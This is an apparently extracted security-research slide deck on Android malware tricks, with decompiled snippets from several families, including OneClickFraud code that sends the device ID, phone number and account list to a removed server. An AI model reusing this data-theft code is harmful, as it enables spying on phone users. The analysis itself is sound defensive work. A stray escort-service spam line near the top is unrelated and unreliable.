Attackers are starting to move on from simple attacks, mainly because users are starting to figure out that the free adult entertainment or chat app shouldn't be sending SMS messages to expensive numbers. They're leveraging techniques from PC malware like server-side polymorphism, vulnerability exploits, botnets and network updates, and preemptive/direct attacks against security software.
CALL ON ➥8923113531 🔝Call Girls Gomti Nagar Lucknow best Night Fun service
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
1. McAfee Confidential—Internal Use Only
Isn't it all just SMS-sending trojans?:
Real advances in Android Malware
Jimmy Shah
Mobile Security Researcher
6. Attacker Tricks - Encryption
• Simple
– Obfuscations
• Hiding SMS numbers/message text within plaintext HTML files
– Substitution cipher
• Config file containing encrypted SMS numbers/message text
<link rel="stylesheet" type="text/css" href="/en/shar
ed/core/2/css/css.ashx?sc=/en/us/site.config&pt=cspMscomHomePage&c=cspMscomSiteBrand;cspSearchComponent
;cspMscomFeaturePanel;cspMscomMasterNavigation;[<SMS#>:<MSG>]cspMscomNewsBand;cspVerticalRolloverTab;cspAdControl;cspMscomVe
rticalTab;cspSilverGate" /><script type="text/javascript" src="http//i3.microsoft.com/library/svy/broker.js">
</script><meta name="SearchTitle" content="Microsoft.com" scheme="" /><meta name="Description" content="Get
product information, support, and news from Microsoft." scheme="" /><meta name="Title" content="Microsoft.c
<SMS#>::<MSG>::241.55руб.
<SMS#>::<MSG>::173.88руб.
<SMS#>::<MSG>::86.00руб.
7. Attacker Tricks - Encryption
• Complex
– Symmetric cipher
• DES
• Encrypt URL queries and C&C commands
• Encrypt/decrypt config file
– URLs, next connect time
– Encrypt/decrypt C&C commands
– Decrypt root exploits
byte abyte1[] = k.b;
DESKeySpec deskeyspec = new DESKeySpec(abyte1);
javax.crypto.SecretKey secretkey = SecretKeyFactory.getInstance("DES").generateSecret(deskeyspec);
Cipher cipher = Cipher.getInstance("DES");
b = cipher;
cipher.init(2, secretkey);
8. Attacker Tricks – Fraud
• Pretending to be a legitimate app
– Not the same as injecting malicious code
– New or reused code that simulates the real app
• Includes malicious functions
• Almost just malicious code
./com/example/android/service/KitchenTimerService$KitchenTimerBinder.class
./com/example/android/service/R$id.class
./com/example/android/service/R$raw.class
./com/example/android/service/Main$KitchenTimerReceiver.class
./com/example/android/service/KitchenTimerService$2.class
./com/example/android/service/R$attr.class
./com/example/android/service/R$layout.class
./com/example/android/service/R.class
./com/example/android/service/Main.class
./com/example/android/service/R$drawable.class
./com/example/android/service/KitchenTimerService$1.class
./com/example/android/service/KitchenTimerService.class
./com/example/android/service/Main$1.class
./com/example/android/service/R$string.class
./token/bot/StartSettings.class
./token/bot/WebApi.class
./token/bot/CatchResult.class
./token/bot/SendSmsResult.class
./token/bot/SettingsSet.class
./token/bot/ScreenItem.class
./token/bot/AutorunReceiver.class
./token/bot/ServerResponse.class
./token/bot/MainActivity.class
./token/bot/ThreadOperation.class
./token/bot/AlarmReceiver.class
./token/bot/ThreadOperationListener.class
./token/bot/SmsReciver.class
./token/bot/MainApplication.class
./token/bot/MainService.class
./token/bot/SmsItem.class
./token/bot/HttpParam.class
./token/bot/Settings.class
./token/bot/UpdateActivity.class
./token/bot/MainActivity$1.class
Android/OneClickFraud
Android/FakeToken
10. Attacker Tricks – Fraud
• Android/OneClickFraud
– Fake adult entertainment app
• App asks for the user to pay for a subscription to the adult site
– Repeats every 5 minutes
public void onReceive(Context paramContext, Intent paramIntent)
{
kitchenTimerService.schedule(300000L);
setContentView(2130903040);
Account[] arrayOfAccount;
11. Attacker Tricks – Fraud
• Android/OneClickFraud
– Sends user information including Google account to the attacker
if (ctf.intValue() == 0)
{
Main localMain = Main.this;
Integer localInteger = Integer.valueOf(1);
localMain.ctf = localInteger;
TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone");
arrayOfAccount = AccountManager.get(Main.this).getAccounts();
str1 = "";
int i = arrayOfAccount.length;
j = 0;
if (j >= i)
{
String str2 = doPost("http://<removed>", "");
StringBuilder localStringBuilder1 = new StringBuilder("http://<removed>");
String str3 = localTelephonyManager.getDeviceId();
StringBuilder localStringBuilder2 = localStringBuilder1.append(str3).append("&telno=");
String str4 = localTelephonyManager.getLine1Number();
Uri localUri1 = Uri.parse(str4 + "&m_addr=" + str1 + "&usr_id=" + str2);
Intent localIntent1 = new Intent("android.intent.action.VIEW", localUri1);
startActivity(localIntent1);
boolean bool = moveTaskToBack(1);
}
}
12. 4/19/1212
Attacker Tricks - Injecting code
• Android/Moghava.A
– Malicious code injected into a legitimate app
• Recipes for Iranian meals
13. 4/19/1213
Attacker Tricks - Injecting code
• Android/Moghava.A
– Real virus
• Overwriting file infector
– Not executable files, just image files
» Specifically all of your JPGs
» Designed to “photo bomb” all your photos with the Ayotollah
Khomeni
• Code injection:
– Buggy
• Doesn't check if it's infected a file before
./com/Moghava/kicker.smali
./com/Moghava/stamper$1.smali
./com/Moghava/stamper$1$1.smali
./com/Moghava/stamper.smali
./ir/sharif/iranianfoods/R$attr.smali
./ir/sharif/iranianfoods/R$styleable.smali
./ir/sharif/iranianfoods/R$menu.smali
./ir/sharif/iranianfoods/ListItemAdapter.smali
./ir/sharif/iranianfoods/IranData.smali
./ir/sharif/iranianfoods/Touch$AddImgAdp.smali
./ir/sharif/iranianfoods/TabHostActivity.smali
./ir/sharif/iranianfoods/Constants.smali
14. 4/19/1214
Attacker Tricks - Injecting code
localBitmap1 = BitmapFactory.decodeResource(this$0.getResources(), 2130837505);
localBitmap2 = BitmapFactory.decodeFile(localFile2.getPath());
int m = localBitmap2.getWidth();
int n = localBitmap1.getWidth();
int i1 = m;
int i2 = n;
if (i1 > i2)
{
i3 = localBitmap2.getWidth();
i4 = localBitmap2.getHeight();
label122: Bitmap.Config localConfig = Bitmap.Config.ARGB_8888;
localBitmap3 = Bitmap.createBitmap(i3, i4, localConfig);
Canvas localCanvas = new Canvas(localBitmap3);
float f1 = 0.0F;
float f2 = 0.0F;
Paint localPaint1 = null;
localCanvas.drawBitmap(localBitmap2, f1, f2, localPaint1);
float f3 = 100.0F;
float f4 = 300.0F;
Paint localPaint2 = null;
localCanvas.drawBitmap(localBitmap1, f3, f4, localPaint2);
}
16. 4/19/1216
Attacker Tricks – Recording Audio
• Audio
– DTMF(“Touch Tones”)
– Telephone Calls
• Initially used in academic PoCs
– SoundComber
• DB of IVR Converted DTMF
• January 2011
• Very common in spyware
• Used in malware
17. 4/19/1217
Attacker Tricks – Recording Audio
• Android/Nickispy
– Records to AMR files
– August 2011
• Android/GoldenEagle
– Records to AMR files
– September 2011
• Audio recording benefits
– Trade secrets
– CC#
– PINs
18. 4/19/1218
Attacker Tricks - Malware Updates
• Malware authors are now including update functionality
– Keeping the profits rolling in and maintaining control of devices
– Initially just used by mobile botnet clients
• Generally only requires the permission INSTALL_PACKAGES
• android.permission.INSTALL_PACKAGES
• There are two main ways users are attacked
– Fake legitimate updates
• Ex: SYSTEM_PATCH, Android_4.0_patch
• Really just trojan horses
– Malware updating itself
• More functions
– Send sensitive user info
– Exfiltrate data
• New/patched payloads
– Exploits
19. 4/19/1219
Attacker Tricks - Malware Updates
• Real malware updates
– Because even the bad guys understand that sometimes you need to patch
• Usually not visual
– Don't inform the users/victims
– Don't depend on users to approve updates
20. 4/19/1220
Academic Research - Taplogger
• Taplogger
– Combination training and attack app
• Reads accelerometer for keypresses
• Training app is a fake icon matching game
– High score = trained it to steal your pin
• Two attacks
– Number pad logging
» PINs, CC#s,etc.
– Password stealing
» Screen unlock
– Previous research
• Touchlogger
– Two parts – training and logging
• ACCessory
– Detects full keyboard
22. Attacker Tricks - Rooting Exploits
• Rooting Android
– Good for improving security, but can leave you open to attack
– Replacing firmware
– Removing bloatware and security vulnerabilities
• Most attackers are not interested in developing their own exploits
– Function of slow patching on Android and number of parties involved in
releasing new firmware
• “too many chefs in the kitchen”
– Leads to the same three or four common exploits and minor modifications
Exploit Detected as
PSneuter Exploit/RetuenSP.A
Gingerbreak Exploit/Voldbrk, 18 minor variants of the
same exploit
Exploid Exploit/Lvedu, 26 minor variants
RageAgainstTheCage Exploit/Diutes, 5 minor variants
23. Attacker Tricks – Server-Side Polymorphism
• Server-side
– Uses larger resources server side vs. lower powered devices
– Modifying DEX files
• Manual changes
– Renaming source and recompiling
• Automated changes
– Easier than it sounds
– Scriptable text changes in source
24. Attacker Tricks – Server-Side Polymorphism
• One major family: Android/FakeInstaller
• Main generic signature
• Supplementary detections for 25 variants
• Changes
– By day
– By hour
A lot of SMS sending trojans use very simple encryption or obfuscation.
The top one hides the SMS number and message in a standard HTML file. It looks like the attacker possible modified a standard Microsoft provided HTML file. If you&apos;re not looking for it you&apos;d miss it.
Others use very simple substitution ciphers. All of this just to make it less obvious what the SMS number and message are.
Of course if you have the binary, these are easy to reverse.
More advanced malware uses better algorithms like DES. Geinimi uses DES to encrypt its CC traffic and URL queries.
This is a research PoC. It&apos;s in two parts, a desktop application to identify keystrokes from accelrometer readings and eventually an app that uses the derived keystroke/touch databse to identify indiividual numbers.
Future imporvements include expanding from a custom keyboard to the default on-screen keyboard and identification of letters.
The attacker profits initially by identifying when numbers are enterd These can be cc#, SS# or PINs. Future work could capture passwords, acount names and other sensitive data.
Botnets are pretty straightforward. They&apos;re basically client server networks where the clients are infected machines. An attacker infects a large number of machines or devices and then has their command and control server.
Command and control can varie from the simple single server to a network of redundant servers.
Botnets are good for performing attacks against targets(ddos, phishing, etc.) and for gathering informatin, Personally identifiable information, financial records and other confidential informatioon.
Depending on how complex they are the botnet clients may also utilize features of rootkits.